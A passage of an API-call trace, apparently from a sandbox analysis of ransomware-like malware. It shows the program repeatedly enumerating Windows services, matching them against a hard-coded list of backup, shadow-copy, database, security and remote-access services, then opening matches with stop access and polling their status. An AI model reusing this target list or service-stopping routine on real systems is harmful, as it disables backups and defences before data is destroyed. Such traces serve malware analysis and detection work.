StrStrIA (lpFirst="RDPDR", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RdpVideoMiniport", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="rdyboost", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="ReFS", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="ReFSv1", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RemoteAccess", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RemoteRegistry", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RetailDemo", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RmSvc", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RpcEptMapper", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RpcLocator", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RpcSs", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="rspndr", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="s3cap", lpSrch="Dfs") returned 0x0 [0091.030] OpenServiceA (hSCManager=0x355c588, lpServiceName="udfs", dwDesiredAccess=0x2c) returned 0x355c920 [0091.030] QueryServiceStatusEx (in: hService=0x355c920, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0091.031] CloseServiceHandle (hSCObject=0x355c920) returned 1 [0091.032] OpenServiceA (hSCManager=0x355c588, lpServiceName="wudfsvc", dwDesiredAccess=0x2c) returned 0x355c948 [0091.032] QueryServiceStatusEx (in: hService=0x355c948, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0091.032] CloseServiceHandle (hSCObject=0x355c948) returned 1 [0091.037] GetProcessHeap () returned 0x3520000 [0091.037] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35663d8 | out: hHeap=0x3520000) returned 1 [0091.038] CloseServiceHandle (hSCObject=0x355c588) returned 1 [0091.038] SetEvent (hEvent=0x20c) returned 1 [0091.038] Sleep (dwMilliseconds=0x2710) [0101.102] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x357e820 [0101.104] EnumServicesStatusA (in: hSCManager=0x357e820, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x553fdc0, cbBufSize=0x24, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x553fdc0*(lpServiceName=0x0, lpDisplayName=0x0, ServiceStatus.dwServiceType=0x0, ServiceStatus.dwCurrentState=0x0, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 0 [0101.108] GetLastError () returned 0xea [0101.108] GetProcessHeap () returned 0x3520000 [0101.108] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xead4) returned 0x357fc90 [0101.109] EnumServicesStatusA (in: hSCManager=0x357e820, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x357fc90, cbBufSize=0xead4, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x357fc90*(lpServiceName="1394ohci", lpDisplayName="1394 OHCI Compliant Host Controller", ServiceStatus.dwServiceType=0x1, ServiceStatus.dwCurrentState=0x1, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x435, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 1 [0101.267] lstrcpyA (in: lpString1=0x553f9c0, lpString2="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" | out: lpString1="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v") returned="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" [0101.268] StrStrIA (lpFirst="1394ohci", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="3ware", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="ACPI", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AcpiDev", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="acpiex", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="acpipagr", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AcpiPmi", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="acpitime", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AdobeARMservice", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="ADP80XX", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AFD", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="ahcache", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AJRouter", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="ALG", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AmdK8", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AmdPPM", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="amdsata", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="amdsbs", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="amdxata", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AppID", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AppIDSvc", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="Appinfo", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="applockerfltr", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AppMgmt", lpSrch="vss") returned 0x0 [0101.268] StrStrIA (lpFirst="AppReadiness", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="AppVClient", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="AppvStrm", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="AppvVemgr", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="AppvVfs", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="AppXSvc", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="arcsas", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="AsyncMac", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="atapi", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="AudioEndpointBuilder", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="Audiosrv", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="AxInstSV", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="b06bdrv", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="BasicDisplay", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="BasicRender", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="bcmfn", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="bcmfn2", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="BDESVC", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="Beep", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="BFE", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="BITS", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="bowser", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="BrokerInfrastructure", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="Browser", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="BthAvrcpTg", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="BthHFEnum", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="bthhfhid", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="BthHFSrv", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="BTHMODEM", lpSrch="vss") returned 0x0 [0101.269] StrStrIA (lpFirst="bthserv", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="buttonconverter", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CAD", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CapImg", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="cdfs", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CDPSvc", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="cdrom", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CertPropSvc", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="cht4iscsi", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="cht4vbd", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="circlass", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CldFlt", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CLFS", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="ClickToRunSvc", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="ClipSVC", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="clreg", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CmBatt", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CNG", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="cnghwassist", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CompositeBus", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="COMSysApp", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="condrv", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CoreMessagingRegistrar", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CryptSvc", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CSC", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="CscService", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="dam", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="DcomLaunch", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="defragsvc", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="DeviceAssociationService", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="DeviceInstall", lpSrch="vss") returned 0x0 [0101.270] StrStrIA (lpFirst="DevQueryBroker", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="Dfsc", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="Dhcp", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="DiagTrack", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="Disk", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="dmvsc", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="dmwappushservice", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="Dnscache", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="DoSvc", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="dot3svc", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="DPS", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="drmkaud", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="DsmSvc", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="DsSvc", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="DusmSvc", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="DXGKrnl", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="e1iexpress", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="EapHost", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="ebdrv", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="EFS", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="EhStorClass", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="embeddedmode", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="EntAppSvc", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="ErrDev", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="EventLog", lpSrch="vss") returned 0x0 [0101.271] StrStrIA (lpFirst="EventSystem", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="exfat", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="fastfat", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="Fax", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="fdc", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="fdPHost", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="FDResPub", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="fhsvc", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="FileCrypt", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="FileInfo", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="Filetrace", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="flpydisk", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="FltMgr", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="FontCache", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="FrameServer", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="FsDepends", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="fvevol", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="gencounter", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="genericusbfn", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="GPIOClx0101", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="gpsvc", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="gupdate", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="gupdatem", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="HdAudAddService", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="HDAudBus", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="HidBatt", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="HidBth", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="hidi2c", lpSrch="vss") returned 0x0 [0101.272] StrStrIA (lpFirst="hidinterrupt", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="HidIr", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="hidserv", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="HidUsb", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="HomeGroupListener", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="HpSAMD", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="HTTP", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="HvHost", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="hvservice", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="hwpolicy", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="hyperkbd", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="i8042prt", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iagpio", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iai2c", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iaStorAV", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iaStorV", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="ibbus", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="icssvc", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="IKEEXT", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="IndirectKmd", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="intelide", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="intelpep", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="intelppm", lpSrch="vss") returned 0x0 [0101.273] StrStrIA (lpFirst="iorate", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="IpFilterDriver", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="iphlpsvc", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="IPMIDRV", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="IPNAT", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="irda", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="IRENUM", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="irmon", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="isapnp", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="iScsiPrt", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="kbdclass", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="kbdhid", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="kdnic", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="KeyIso", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="KSecDD", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="KSecPkg", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="ksthunk", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="KtmRm", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="LanmanServer", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="lfsvc", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="LicenseManager", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="lltdio", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="lltdsvc", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="lmhosts", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="LSI_SAS", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="vss") returned 0x0 [0101.274] StrStrIA (lpFirst="LSI_SSS", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="LSM", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="luafv", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="MapsBroker", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="mausbhost", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="mausbip", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="megasas", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="megasas2i", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="megasr", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="mlx4_bus", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="MMCSS", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="Modem", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="monitor", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="mouclass", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="mouhid", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="mountmgr", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="mpsdrv", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="MpsSvc", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="MRxDAV", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="mrxsmb", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="mrxsmb10", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="mrxsmb20", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="MsBridge", lpSrch="vss") returned 0x0 [0101.275] StrStrIA (lpFirst="MSDTC", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="Msfs", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="msgpiowin32", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="mshidkmdf", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="mshidumdf", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="msisadrv", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="MSiSCSI", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="msiserver", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="MSKSSRV", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="MsLldp", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="MSPCLOCK", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="MSPQM", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="MsRPC", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="MsSecFlt", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="mssmbios", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="MSTEE", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="MTConfig", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="Mup", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="mvumis", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="NativeWifiP", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="NcaSvc", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="NcbService", lpSrch="vss") returned 0x0 [0101.276] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="vss") returned 0x0 [0101.277] OpenServiceA (hSCManager=0x357e820, lpServiceName="vmicvss", dwDesiredAccess=0x2c) returned 0x357e7a8 [0101.278] QueryServiceStatusEx (in: hService=0x357e7a8, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0101.279] CloseServiceHandle (hSCObject=0x357e7a8) returned 1 [0101.279] OpenServiceA (hSCManager=0x357e820, lpServiceName="VSS", dwDesiredAccess=0x2c) returned 0x357e640 [0101.279] QueryServiceStatusEx (in: hService=0x357e640, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0101.279] CloseServiceHandle (hSCObject=0x357e640) returned 1 [0101.288] OpenServiceA (hSCManager=0x357e820, lpServiceName="cdfs", dwDesiredAccess=0x2c) returned 0x357e640 [0101.333] QueryServiceStatusEx (in: hService=0x357e640, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0101.334] CloseServiceHandle (hSCObject=0x357e640) returned 1 [0101.334] OpenServiceA (hSCManager=0x357e820, lpServiceName="Dfsc", dwDesiredAccess=0x2c) returned 0x357e848 [0101.335] QueryServiceStatusEx (in: hService=0x357e848, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0101.335] Sleep (dwMilliseconds=0x3e8) [0102.432] QueryServiceStatusEx (in: hService=0x357e848, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0102.433] GetTickCount () returned 0x115ab9e [0102.433] CloseServiceHandle (hSCObject=0x357e848) returned 1 [0102.434] OpenServiceA (hSCManager=0x357e820, lpServiceName="udfs", dwDesiredAccess=0x2c) returned 0x357e848 [0102.434] QueryServiceStatusEx (in: hService=0x357e848, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0102.435] CloseServiceHandle (hSCObject=0x357e848) returned 1 [0102.436] OpenServiceA (hSCManager=0x357e820, lpServiceName="wudfsvc", dwDesiredAccess=0x2c) returned 0x357e848 [0102.436] QueryServiceStatusEx (in: hService=0x357e848, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0102.436] CloseServiceHandle (hSCObject=0x357e848) returned 1 [0102.436] GetProcessHeap () returned 0x3520000 [0102.436] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x357fc90 | out: hHeap=0x3520000) returned 1 [0102.437] CloseServiceHandle (hSCObject=0x357e820) returned 1 [0102.438] SetEvent (hEvent=0x20c) returned 1 [0102.438] Sleep (dwMilliseconds=0x2710) [0112.702] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x357eb40 [0112.707] EnumServicesStatusA (in: hSCManager=0x357eb40, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x553fdc0, cbBufSize=0x24, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x553fdc0*(lpServiceName=0x0, lpDisplayName=0x0, ServiceStatus.dwServiceType=0x0, ServiceStatus.dwCurrentState=0x0, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 0 [0112.715] GetLastError () returned 0xea [0112.715] GetProcessHeap () returned 0x3520000 [0112.715] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, 